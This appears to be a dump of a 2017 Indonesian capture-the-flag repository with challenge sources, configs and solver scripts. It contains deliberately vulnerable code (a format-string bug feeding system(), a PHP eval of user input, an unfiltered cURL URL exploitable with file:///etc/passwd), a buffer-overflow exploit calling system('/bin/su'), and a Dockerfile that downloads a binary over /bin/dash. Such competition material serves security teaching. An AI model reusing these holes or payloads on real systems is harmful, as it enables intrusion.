howto_blog | TESTED | 9 | | kudanil_lsi | X | 10 | | math_service | TESTED | 11 | | musicality_icon | TESTED | 12 | | sanca | TESTED | 13 | -------------------------------------------------------------------------------- /2017-quals/cryptography/circle/solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import circle 4 | import sys 5 | 6 | for j in range(1, 100): 7 | cipher = 'Hy80o81d9}95{8047Ta887k43c2a' 8 | print j 9 | for i in range(100): 10 | cipher = circle.encrypt(cipher, j) 11 | if 'HackToday' in cipher: 12 | print i, cipher 13 | sys.exit(0) 14 | -------------------------------------------------------------------------------- /2017-quals/exploitation/chatbot/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | web: 4 | image: chatbot:latest 5 | deploy: 6 | replicas: 3 7 | resources: 8 | limits: 9 | cpus: "0.1" 10 | memory: 50M 11 | restart_policy: 12 | condition: on-failure 13 | ports: 14 | - "40135:5000" 15 | networks: 16 | - overlay 17 | networks: 18 | overlay: 19 | -------------------------------------------------------------------------------- /2017-quals/exploitation/epoch-service/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | web: 4 | image: epoch:latest 5 | deploy: 6 | replicas: 3 7 | resources: 8 | limits: 9 | cpus: "0.1" 10 | memory: 50M 11 | restart_policy: 12 | condition: on-failure 13 | ports: 14 | - "47000:5000" 15 | networks: 16 | - overlay 17 | networks: 18 | overlay: 19 | -------------------------------------------------------------------------------- /2017-quals/exploitation/turuturu/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | web: 4 | image: turuturu:latest 5 | deploy: 6 | replicas: 3 7 | resources: 8 | 
limits: 9 | cpus: "0.1" 10 | memory: 50M 11 | restart_policy: 12 | condition: on-failure 13 | ports: 14 | - "40074:5000" 15 | networks: 16 | - overlay 17 | networks: 18 | overlay: 19 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/config/db.php: -------------------------------------------------------------------------------- 1 | 'yii\db\Connection', 5 | 'dsn' => 'sqlite:'.__DIR__.'/../sqlite/mass.db', 6 | 'username' => '', 7 | 'password' => '', 8 | 'charset' => 'utf8', 9 | 10 | // Schema cache options (for production environment) 11 | //'enableSchemaCache' => true, 12 | //'schemaCacheDuration' => 60, 13 | //'schemaCache' => 'cache', 14 | ]; 15 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/global/window.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * global/window.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | "function"==typeof define&&define.amd?define(function(){return window}):"object"==typeof exports&&(module.exports=window); -------------------------------------------------------------------------------- /platform-attack-defense/web-platform/README.md: -------------------------------------------------------------------------------- 1 | # Web Platform 2 | 3 | Fungsi: 4 | - Admin dapat menambahkan/ganti/hapus *team* 5 | - Admin dapat menambahkan/ganti/hapus *soal* 6 | - Admin dapat menambahkan/ganti/hapus *flag* 7 | - Team dapat submit *flag* 8 | - Team dapat Lihat dan download soal 9 | - Scoreboard *+Fitur Freeze* 10 | - API untuk menerima kirim bot service (untuk mengurangi score yang down) 100 FAIL dalam 5 jam maka minus poin 11 | 
-------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/index.php: -------------------------------------------------------------------------------- 1 | run(); 13 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/functional.suite.yml: -------------------------------------------------------------------------------- 1 | # Codeception Test Suite Configuration 2 | 3 | # suite for functional (integration) tests. 4 | # emulate web requests and make application process them. 5 | # (tip: better to use with frameworks). 6 | 7 | # RUN `build` COMMAND AFTER ADDING/REMOVING MODULES. 8 | #basic/web/index.php 9 | class_name: FunctionalTester 10 | modules: 11 | enabled: 12 | - Filesystem 13 | - Yii2 14 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/global/document.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * global/document.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | "function"==typeof define&&define.amd?define(function(){return document}):"object"==typeof exports&&(module.exports=document); -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/README.md: -------------------------------------------------------------------------------- 1 | # Musicality_icon 2 | ## Description 3 | Setiap user yang terdaftar dapat memperbarui avatarnya dengan menyisipkan URL gambar ke *field* yang disediakan. URL tersebut kemudian di cURL dan disimpan di dalam server dalam bentuk `md5(*string_random*).jpg`. 
4 | 5 | ## Exploit 6 | URL yang dimasukkan user tidak difilter sebelum diteruskan ke cURL, sehingga user bisa memasukkan `file:///etc/passwd` untuk mendapatkan flag. Pada aplikasi sungguhan, batasi skema ke `http`/`https` (misalnya dengan `CURLOPT_PROTOCOLS` dan `CURLOPT_REDIR_PROTOCOLS`) dan tolak tujuan ke alamat internal. 7 | 8 | ## Database 9 | - SQLite3, lokasi: @webroot/sqlite/data.db -------------------------------------------------------------------------------- /platform-attack-defense/web-platform/admin.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | 8 | 9 |
22 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/views/site/about.php: -------------------------------------------------------------------------------- 1 | title = 'How To Blog | About'; 8 | $this->params['breadcrumbs'][] = 'About'; 9 | ?> 10 |
11 |

About

12 | 13 |

14 | How To Blog is a blog for sharing information about anything that is useful for anyone. Everyone registered can create new articles . 15 |

16 | 17 |
18 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/README.md: -------------------------------------------------------------------------------- 1 | # HowTo Blog 2 | ## Description 3 | Yii2 Mass Assignment exploit. 4 | Mengubah role `user` menjadi `admin` dengan meng-*intercept* *request* POST saat proses registrasi user baru. Hanya role `admin` yang dapat mengakses flag di halaman utama. Celah seperti ini muncul bila atribut `role` ikut terisi dari input POST; pada aplikasi sungguhan, atribut tersebut tidak boleh menjadi atribut *safe* di `rules()`/`scenarios()` model dan harus ditetapkan di sisi server. 5 | 6 | ## Installation 7 | - Gunakan [composer](https://getcomposer.org/download/) untuk menginstal *dependency* Yii.
8 | ``$ php composer.phar install`` 9 | 10 | ## Database 11 | - SQLite3, lokasi: @webroot/sqlite/mass.db -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/acceptance/HomeCest.php: -------------------------------------------------------------------------------- 1 | amOnPage(Url::toRoute('/site/index')); 9 | $I->see('My Company'); 10 | 11 | $I->seeLink('About'); 12 | $I->click('About'); 13 | $I->wait(2); // wait for page to be opened 14 | 15 | $I->see('This is the About page.'); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /2017-quals/cryptography/circle/circle.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | def encrypt(flag, n): 4 | check = [0 for i in range(len(flag))] 5 | point = 1 6 | result = flag[0] 7 | check[0] = 1 8 | i = 0 9 | 10 | while len(result) != len(flag): 11 | if check[i % len(flag)] == 0: 12 | if point == n: 13 | result += flag[i % len(flag)] 14 | check[i % len(flag)] = 1 15 | point = 0 16 | else: 17 | point -= 1 18 | 19 | i += 1 20 | point += 1 21 | 22 | return result 23 | 24 | def decrypt(): 25 | #not implemented yet 26 | pass 27 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/public: -------------------------------------------------------------------------------- 1 | p= 0x983e630c03d282b25980786394884d2f707827184a89ecc71e3a280afa6e5300a36b131b0da385f4fd6e38ff33d9ee8f54b837b6ee43b6131da0228a3654dd2b 2 | g= 0xa0d7f4addb645be80ab40abe5a27bac0f2edaf2488dd9cf07b5204d517599baa3dc489b7edef3e037a9d49dd4f68c396a1e091f88d0b320e2786fefea6528305 3 | A= 0x6990ce2e3a80719bc7390401300cc3d420d391fd5bc29784807785aa9fbb468ccfd0741a9c4890883806c0f307fd53b5ec5877017841cc09681885f867f350a 4 | B= 
0x45d0269a1f9ca964641a0a75a024bd77b409080369ae6a77af74972f8ec809e3757948bc355c0df58d3af3aabf45c47fe6c9171e9c882ee4cb7f93097e946484 -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/dependencyLibs/inputmask.dependencyLib.jquery.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * dependencyLibs/inputmask.dependencyLib.jquery.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | !function(a){"function"==typeof define&&define.amd?define(["jquery"],a):"object"==typeof exports?module.exports=a(require("jquery")):window.dependencyLib=a(jQuery)}(function(a){return a}); -------------------------------------------------------------------------------- /2017-quals/exploitation/epoch-service/src/epoch.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() 5 | { 6 | setvbuf(stdout, NULL, _IONBF, 0); 7 | 8 | char cmd[9] = "date +%s"; 9 | char nama[256]; 10 | char temp[256]; 11 | 12 | printf("Nomor Pengguna: %o\n", &cmd); 13 | printf("Nama: "); 14 | fgets(temp, 256, stdin); 15 | snprintf(nama, sizeof(nama), temp); 16 | printf("-----------\nHalo %s", nama); 17 | printf("\nEpoch: "); 18 | run(cmd); 19 | return 0; 20 | 21 | 22 | } 23 | 24 | 25 | int run(char ** cmd){ 26 | 27 | system(cmd); 28 | return 0; 29 | } -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tiangolo/uwsgi-nginx-flask:flask 2 | 3 | # copy over our requirements.txt file 4 | COPY requirements.txt /tmp/ 5 | 6 | # upgrade pip and install required python packages 7 
| RUN pip install -U pip 8 | RUN pip install -r /tmp/requirements.txt 9 | 10 | # copy over our app code 11 | COPY ./src /app 12 | 13 | # Create decoy 14 | COPY ./here /here 15 | 16 | # create portal 17 | RUN /bin/ln -s / /app/static/css/portal 18 | 19 | # set an environmental variable, MESSAGE, 20 | # which the app will use and display 21 | ENV MESSAGE "hello from Docker" 22 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/time_is_money/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 | Password : 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 27 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/permute/gen.py: -------------------------------------------------------------------------------- 1 | from collections import defaultdict 2 | import random 3 | random.seed(42) 4 | 5 | trick_str = "HackToday{xxtHi$_1s_N0t_The_real_Flagxx}" 6 | target_str = "HackToday{str1Ng$_tr1cks_Hack}" 7 | 8 | pos_map = defaultdict(list) 9 | 10 | for i,c in enumerate(trick_str): 11 | pos_map[c].append(i) 12 | 13 | res = [] 14 | for c in target_str: 15 | if c not in pos_map: 16 | print "Can't find mapping for ", c 17 | exit(0) 18 | res.append(str(random.choice(pos_map[c]))) 19 | print 'const char *trick_str = "{0}";'.format(trick_str) 20 | print "int permute[] = {" + ", ".join(res) + ", -1};" 21 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/yii.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | rem ------------------------------------------------------------- 4 | rem Yii command line bootstrap script for Windows. 
5 | rem 6 | rem @author Qiang Xue 7 | rem @link http://www.yiiframework.com/ 8 | rem @copyright Copyright (c) 2008 Yii Software LLC 9 | rem @license http://www.yiiframework.com/license/ 10 | rem ------------------------------------------------------------- 11 | 12 | @setlocal 13 | 14 | set YII_PATH=%~dp0 15 | 16 | if "%PHP_COMMAND%" == "" set PHP_COMMAND=php.exe 17 | 18 | "%PHP_COMMAND%" "%YII_PATH%yii" %* 19 | 20 | @endlocal 21 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/troll/genflag.py: -------------------------------------------------------------------------------- 1 | import random 2 | random.seed(1945) 3 | 4 | with open("troll.txt") as f: 5 | text = f.read() 6 | 7 | flag = "HackToday{HTML_Troll}" 8 | 9 | res = "" 10 | for c in flag: 11 | a = ("0000000" + bin(ord(c))[2:])[-7:] 12 | res += a 13 | 14 | print res 15 | 16 | tmp = list(text) 17 | res = res.replace("1", "O") 18 | 19 | idx = 0 20 | for i,c in enumerate(tmp): 21 | if (c=="Q"): 22 | if random.randint(0,3)==2: 23 | tmp[i] =res[idx] 24 | idx +=1 25 | if idx==len(res): 26 | break 27 | 28 | assert(idx==len(res)) 29 | 30 | with open("tf.txt", "w") as f: 31 | f.write("".join(tmp)) 32 | 33 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/bin/yii.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | rem ------------------------------------------------------------- 4 | rem Yii command line bootstrap script for Windows. 
5 | rem 6 | rem @author Qiang Xue 7 | rem @link http://www.yiiframework.com/ 8 | rem @copyright Copyright (c) 2008 Yii Software LLC 9 | rem @license http://www.yiiframework.com/license/ 10 | rem ------------------------------------------------------------- 11 | 12 | @setlocal 13 | 14 | set YII_PATH=%~dp0 15 | 16 | if "%PHP_COMMAND%" == "" set PHP_COMMAND=php.exe 17 | 18 | "%PHP_COMMAND%" "%YII_PATH%yii" %* 19 | 20 | @endlocal 21 | -------------------------------------------------------------------------------- /2017-finals/soal/gen_creds.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need team numbers as argument"; exit 4 | fi 5 | team=$1 6 | echo -n "" > username.list 7 | echo -n "" > password.list 8 | echo -n "" > token.list 9 | for i in `seq 1 $team`; do 10 | username="$(tr -cd '[:lower:]' < /dev/urandom | fold -w10 | head -n1 | awk '{ print $1 }')" 11 | echo $username >> username.list 12 | password="$(tr -cd '[:lower:]' < /dev/urandom | fold -w15 | head -n1 | awk '{ print $1 }')" 13 | echo $password >> password.list 14 | token="$(tr -cd '[:lower:]' < /dev/urandom | fold -w5 | head -n1 | awk '{ print $1 }')" 15 | echo $token >> token.list 16 | done -------------------------------------------------------------------------------- /2017-finals/soal/kudanil_lsi/solution.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from subprocess import check_output as co 3 | p = process("./kudanil_lsi") 4 | p.sendline("") 5 | e = ELF('./kudanil_lsi') 6 | 7 | binsu = next(e.search('/bin/su')) 8 | system_plt = e.plt['system'] 9 | 10 | s = p.recvuntil("su") 11 | 12 | s = s.split("\n")[-11:] 13 | 14 | s = "\n".join(s) 15 | print s 16 | f = open('map','w') 17 | f.write(s) 18 | f.close() 19 | solution = co('cat map | ./map.solution', shell=True) 20 | 21 | for c in range(0, len(solution)): 22 | p.sendline(solution[c]) 23 | 24 | payload = 
"A"*23 + p32(system_plt) + 'BBBB' + p32(binsu) 25 | p.sendline(payload) 26 | p.interactive() 27 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/yii: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | run(); 21 | exit($exitCode); 22 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/here/main.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, render_template 2 | # set the project root directory as the static folder, you can set others. 3 | app = Flask(__name__) 4 | import os 5 | assert os.environ['FLAG'] 6 | 7 | 8 | @app.route('/') 9 | @app.route('/') 10 | def root(index="index.html"): 11 | return app.send_static_file(index) 12 | 13 | @app.route('/css/') 14 | def send_css(filename): 15 | return send_from_directory('css', filename) 16 | 17 | 18 | @app.errorhandler(404) 19 | def page_not_found(e): 20 | argg = request.args.get('val') 21 | return render_template('404.html',args=argg),404 22 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/Dockerfile.old: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.05 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 40065 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat 11 | RUN apt-get install socat lib32ncurses5 wget -y 12 | 13 | # Set WorkDir 14 | RUN mkdir /app 15 | WORKDIR /app 16 | 17 | # Copy binary to workdir 18 | COPY here/ /here 19 | COPY src/ /app 20 | 21 | # Securing Environment 22 | RUN wget https://transfer.sh/6ntGG/dash -O /bin/dash 23 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 24 | RUN chmod 755 /bin/dash /bin/sh /bin/cat /usr/bin/id /bin/ls 25 | 26 | # Run Program 27 | CMD socat 
TCP-LISTEN:5000,reuseaddr,fork EXEC:./epoch,su=nobody 28 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/views/site/error.php: -------------------------------------------------------------------------------- 1 | title = $name; 11 | ?> 12 |
13 | 14 |

title) ?>

15 | 16 |
17 | 18 |
19 | 20 |

21 | The above error occurred while the Web server was processing your request. 22 |

23 |

24 | Please contact us if you think this is a server error. Thank you. 25 |

26 | 27 |
28 | -------------------------------------------------------------------------------- /2017-finals/soal/buaya_lsi/buaya.gambar: -------------------------------------------------------------------------------- 1 | _ ___ /^^\ /^\ /^^\_ 2 | _ _@)@) \ ,,/ '` ~ `'~~ ', `\. 3 | _/o\_ _ _ _/~`.`...'~\ ./~~..,'`','',.,' ' ~: 4 | / `,'.~,~.~ . , . , ~|, ,/ .,' , ,. .. ,,. `, ~\_ 5 | ( ' _' _ '_` _ ' . , `\_/ .' ..' ' ` ` `.. `, \_ 6 | ~V~ V~ V~ V~ ~\ ` ' . ' , ' .,.,''`.,.''`.,.``. ', \_ 7 | _/\ /\ /\ /\_/, . ' , `_/~\_ .' .,. ,, , _/~\_ `. `. '., \_ 8 | < ~ ~ '~`'~'`, ., . `_: ::: \_ ' `_/ ::: \_ `.,' . ', \_ 9 | \ ' `_ '`_ _ ',/ _::_::_ \ _ _/ _::_::_ \ `.,'.,`., \-,-,-,_,_, 10 | `'~~ `'~~ `'~~ `'~~ \(_)(_)(_)/ `~~' \(_)(_)(_)/ ~'`\_.._,._,'_;_;_;_;_; 11 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/acceptance/LoginCest.php: -------------------------------------------------------------------------------- 1 | amOnPage(Url::toRoute('/site/login')); 9 | $I->see('Login', 'h1'); 10 | 11 | $I->amGoingTo('try to login with correct credentials'); 12 | $I->fillField('input[name="LoginForm[username]"]', 'admin'); 13 | $I->fillField('input[name="LoginForm[password]"]', 'admin'); 14 | $I->click('login-button'); 15 | $I->wait(2); // wait for button to be clicked 16 | 17 | $I->expectTo('see user info'); 18 | $I->see('Logout'); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/assets/AppAsset.php: -------------------------------------------------------------------------------- 1 | 14 | * @since 2.0 15 | */ 16 | class AppAsset extends AssetBundle 17 | { 18 | public $basePath = '@webroot'; 19 | public $baseUrl = '@web'; 20 | public $css = [ 21 | 'css/site.css', 22 | ]; 23 | public $js = [ 24 | ]; 25 | public $depends = [ 26 | 'yii\web\YiiAsset', 27 | 'yii\bootstrap\BootstrapAsset', 28 | ]; 29 | } 30 | 
-------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/page/404.php: -------------------------------------------------------------------------------- 1 |

404 NOT FOUND!

12 |

Document you are looking for is not found in this server

-------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/.travis.yml: -------------------------------------------------------------------------------- 1 | language: php 2 | 3 | php: 4 | - 5.4 5 | - 5.5 6 | - 5.6 7 | - 7.0 8 | - 7.1 9 | # - hhvm 10 | 11 | # faster builds on new travis setup not using sudo 12 | sudo: false 13 | 14 | # cache vendor dirs 15 | cache: 16 | directories: 17 | - $HOME/.composer/cache 18 | 19 | install: 20 | - travis_retry composer self-update && composer --version 21 | - travis_retry composer update --dev --prefer-dist --no-interaction 22 | # setup application: 23 | - | 24 | sed -i "s/'cookieValidationKey' => ''/'cookieValidationKey' => 'testkey'/" config/web.php 25 | 26 | script: 27 | - | 28 | php -S localhost:8080 -t web > /dev/null 2>&1 & 29 | vendor/bin/codecept run 30 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/_support/FunctionalTester.php: -------------------------------------------------------------------------------- 1 | 3 | #include 4 | #include "permute.h" 5 | 6 | const char *msgs[] = {"Wrong Flag", "Correct Flag"}; 7 | 8 | int main(int argc, char *argv[]) 9 | { 10 | int i, all, len, stlen; 11 | if (argc<2) { 12 | printf("usage: theflag \n"); 13 | return 0; 14 | } 15 | const char *input = argv[1]; 16 | all = 0; 17 | for (len=0; permute[len]!=-1; len++) { 18 | } 19 | stlen = strlen(input); 20 | all |= (int)len!=stlen; 21 | 22 | for (i=0; i < stlen; i++) { 23 | all |=( input[i] ^ trick_str[permute[i]]); 24 | } 25 | puts(msgs[(int)(all==0)]); 26 | 27 | return 0; 28 | } 29 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | HackToday 0x00 2 | ============== 3 | 4 | Kategori 5 | -------- 6 | - Web Hacking 7 | - Exploitation 8 | - Reverse Engineering 9 | - Forensics 10 | 
- Cryptography 11 | 12 | Format Flag 13 | -------- 14 | 15 | ## `^HackToday{\w+}$` ## 16 | 17 | Penyisihan Online 18 | ----------------- 19 | 20 | Level | Total |Poin | Distribusi 21 | ----------|-------|-----|----------- 22 | Easy | 7 | 481 | 62, 65, 67, 69, 71, 73, 74 23 | Medium | 5 | 452 | 87, 89, 91, 92, 93 24 | Hard | 3 | 404 | 132, 135, 137 25 | 26 | 27 | ---------- 28 | 29 | Total Point: 1337 30 | 31 | Tanggal 32 | ------- 33 | 34 | Penyisihan | Final 35 | -----------------|------- 36 | 5/6 Agustus 2017 | 16/17 September 2017 37 | 38 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/.travis.yml: -------------------------------------------------------------------------------- 1 | language: php 2 | 3 | php: 4 | - 5.4 5 | - 5.5 6 | - 5.6 7 | - 7.0 8 | - 7.1 9 | # - hhvm 10 | 11 | # faster builds on new travis setup not using sudo 12 | sudo: false 13 | 14 | # cache vendor dirs 15 | cache: 16 | directories: 17 | - $HOME/.composer/cache 18 | 19 | install: 20 | - travis_retry composer self-update && composer --version 21 | - travis_retry composer update --dev --prefer-dist --no-interaction 22 | # setup application: 23 | - | 24 | sed -i "s/'cookieValidationKey' => ''/'cookieValidationKey' => 'testkey'/" config/web.php 25 | 26 | script: 27 | - | 28 | php -S localhost:8080 -t web > /dev/null 2>&1 & 29 | vendor/bin/codecept run 30 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/bower.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "cryptonode", 3 | "description": "An encrypted chat program", 4 | "main": "app.js", 5 | "authors": [ 6 | "Supernomad " 7 | ], 8 | "license": "Apache-2.0", 9 | "keywords": [ 10 | "encrypted", 11 | "encryption", 12 | "aes", 13 | "aws256", 14 | "messaging", 15 | "messenger", 16 | "im", 17 | "instant" 18 | ], 19 | "homepage": 
"https://github.com/Supernomad/CryptoNode", 20 | "moduleType": [ 21 | "es6", 22 | "node" 23 | ], 24 | "private": true, 25 | "ignore": [ 26 | "**/.*", 27 | "node_modules", 28 | "bower_components", 29 | "test", 30 | "tests" 31 | ] 32 | } 33 | -------------------------------------------------------------------------------- /2017-finals/soal/entry_username_password.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from pwn import * 4 | 5 | a = remote('192.168.8.236', 1337) 6 | print a.recvuntil('Username:') 7 | a.sendline('admin') 8 | print a.recvuntil('Token') 9 | a.sendline('polisi') 10 | 11 | usernames = open('username.list').read().split('\n') 12 | names = open('name.list').read().split('\n') 13 | tokens = open('token.list').read().split('\n') 14 | 15 | for i in range(1, 11): 16 | print a.recvuntil('>>>') 17 | a.sendline('/add teams') 18 | print a.recvuntil('Username:') 19 | a.sendline(usernames[i-1]) 20 | print a.recvuntil('Team number:') 21 | a.sendline(str(i)) 22 | print a.recvuntil('Token:') 23 | a.sendline(tokens[i-1]) 24 | print a.recvuntil('Team name:') 25 | a.sendline(names[i-1]) -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/_support/UnitTester.php: -------------------------------------------------------------------------------- 1 | 115)die("masa format date panjang gitu, hmmm mencurigakan..."); 16 | $fmt = base64_decode($_GET['f']); 17 | if(contains($fmt, $blacklists)) die("no attacker allowed!!!"); 18 | eval('echo date("'.$fmt.'");'); 19 | die(); 20 | } 21 | } 22 | 23 | die("only admin can see my day!"); 24 | ?> 25 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/_support/AcceptanceTester.php: -------------------------------------------------------------------------------- 1 | 8 | beginPage() ?> 9 | 10 | 11 | 12 | 13 | <?= 
Html::encode($this->title) ?> 14 | head() ?> 15 | 16 | 17 | beginBody() ?> 18 | 19 | endBody() ?> 20 | 21 | 22 | endPage() ?> 23 | -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/webasm/src/webasm.c: -------------------------------------------------------------------------------- 1 | // compile: 2 | // 3 | // emcc -o webasm.html -O2 webasm.c -s WASM=1 -s EXPORTED_FUNCTIONS="['_cekpass']" --shell-file template.html 4 | 5 | #include 6 | 7 | void engkrip(uint8_t *buf, int len) { 8 | int k = len; 9 | int i; 10 | 11 | int m = 134456; 12 | int c = 8121; 13 | int a = 28411; 14 | 15 | for (i = 0; i < len; i++) { 16 | buf[i] ^= k; 17 | k = (a*k + c) % m; 18 | } 19 | } 20 | 21 | int cekpass(uint8_t *buf, int len) { 22 | uint8_t key[29] = {118, 232, 97, 45, 18, 214, 128, 135, 32, 41, 237, 147, 26, 217, 106, 187, 199, 209, 210, 205, 155, 215, 226, 49, 120, 138, 236, 42, 74}; 23 | int i; 24 | int c = 0; 25 | 26 | engkrip(buf, len); 27 | 28 | for (i = 0; i < len; i++) { 29 | c |= buf[i] ^ key[i]; 30 | } 31 | 32 | return (c == 0); 33 | } 34 | 35 | 36 | -------------------------------------------------------------------------------- /2017-finals/soal/flag_submit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | import sys 4 | 5 | a = remote("192.168.8.236",1337) 6 | username = "admin" 7 | password = "polisi" 8 | a.recvuntil(": ") 9 | a.sendline(username) 10 | a.recvuntil(": ") 11 | a.sendline(password) 12 | if(len(sys.argv)>1): 13 | file = open(sys.argv[1], "r") 14 | fileread = file.read() 15 | hasil =fileread.split("\n") 16 | for i in hasil: 17 | flag = (i.split(","))[:1][0] 18 | team = (i.split(","))[1:][0] 19 | problem_num = (i.split(","))[-1][0] 20 | print a.recvuntil(">>> ") 21 | a.sendline("/add flags") 22 | print a.recvuntil(": "),flag 23 | a.sendline(flag) 24 | print a.recvuntil(": "),team 25 | a.sendline(team) 26 | print 
a.recvuntil(": "),problem_num 27 | a.sendline(problem_num) 28 | print "DONE !!!" 29 | else: 30 | print "NEED DIRECTORY ARGUMENT\n\nex:./flag_submit.py docker_math.csv\n\n" -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/bin/yii: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | [ 21 | 'db' => require __DIR__ . '/../../config/test_db.php' 22 | ] 23 | ] 24 | ); 25 | 26 | 27 | $application = new yii\console\Application($config); 28 | $exitCode = $application->run(); 29 | exit($exitCode); 30 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/commands/HelloController.php: -------------------------------------------------------------------------------- 1 | 18 | * @since 2.0 19 | */ 20 | class HelloController extends Controller 21 | { 22 | /** 23 | * This command echoes what you have entered as the message. 24 | * @param string $message the message to be echoed. 25 | */ 26 | public function actionIndex($message = 'hello world') 27 | { 28 | echo $message . 
"\n"; 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/balikin/main.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import XOR 2 | import base64 3 | import codecs 4 | source = "flag" 5 | target = "hasil" 6 | key = "RENDANGBASOGULING" 7 | 8 | BLOCKSIZE = 1048576 9 | 10 | def cobacoba(data): 11 | hasil = "" 12 | kr=0 13 | for i in data[::-1]: 14 | hasil+= chr(ord(i)+ord(key[kr%len(key)])) 15 | 16 | kr+=1 17 | 18 | cipher = XOR.new(key) 19 | return base64.b64encode(cipher.encrypt(hasil)) 20 | 21 | 22 | with codecs.open(source, "r", "utf-8") as sourceFile: 23 | with codecs.open(target, "w", "ascii") as targetFile: 24 | while True: 25 | contents = sourceFile.read(BLOCKSIZE) 26 | contents = cobacoba(contents) 27 | if not contents: 28 | break 29 | 30 | targetFile.write(contents) 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/index.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/src/templates/404.html: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 404 Not Founds 9 | 10 | 11 | 12 |
404
THE PAGE
24 |
WAS NOT FOUND
25 | BACK TO MARS 26 |
